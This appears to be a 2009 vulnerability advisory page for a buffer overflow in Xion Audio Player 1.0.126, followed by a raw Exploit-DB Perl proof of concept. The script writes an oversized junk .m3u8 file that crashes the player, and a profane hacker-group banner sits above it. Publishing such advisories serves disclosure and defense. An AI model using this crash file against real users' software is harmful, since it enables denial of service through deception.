Xion Audio Player 1.0.126 (.m3u8) Buffer Overflow Vulnerability

vendor:

Xion Audio Player

by:

anT!-Tr0J4n

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Xion Audio Player

Affected Version From: 1.0.126

Affected Version To: 1.0.126

Patch Exists: YES

Related CWE: N/A

CPE: o:xion_software:xion_audio_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2009

Xion Audio Player 1.0.126 (.m3u8) Buffer Overflow Vulnerability

Xion Audio Player 1.0.126 is vulnerable to a buffer overflow vulnerability when a specially crafted .m3u8 file is opened. The vulnerability is caused due to a boundary error when copying user-supplied data into a fixed-length buffer. This can be exploited to cause a stack-based buffer overflow by e.g. tricking a user into opening a specially crafted .m3u8 file.

Mitigation:

Upgrade to the latest version of Xion Audio Player.

Source

Exploit-DB raw data:

===================================================
Xion Audio Player 1.0.126 (.m3u8) Buffer Overflow Vulnerability
===================================================

.....................X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada ...
.......................................Fuck ALL lamers top-team................... 

#!/usr/bin/perl
#Title: Xion Audio Player 1.0.126 (.m3u8) Buffer Overflow Vulnerability

#Author    :   anT!-Tr0J4n

#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

#Greetz    :   Dev-PoinT.com ; GlaDiatOr,SILVER STAR , HoBeeZ, Coffin Of Evil

#special thanks    :   r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu
 
#Home     :   www.Dev-PoinT.com  $ http://1337db.com/

#Software :  http://xion.r2.com.au

#Tested on:   Windows XP sp3

#
###################################################################
 
my $file= "inj3ct0r team.m3u8";
 
my $junk= "\x41" x  3569;
  
open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("File created succesufully , open  it with Xion Audio Player and press the Play button");